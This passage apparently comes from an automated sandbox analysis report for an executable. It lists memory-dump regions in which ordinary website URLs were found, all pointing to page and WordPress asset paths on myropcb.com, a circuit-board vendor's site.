                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/shipping-cost/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/terms-of-service/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.5.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/plugins/lightbox-2/lightbox.js?ver=1.8
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/plugins/wp-simple-firewall/resources/js/shield/notbot.js?ver=18.1.
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/images/login1.gif
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/images/register1.gif
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/images/shopping_car.png
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/js/easySlider.js
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/js/jquery-ui.min.js
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/style.css
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/thematic/library/scripts/hoverIntent.js
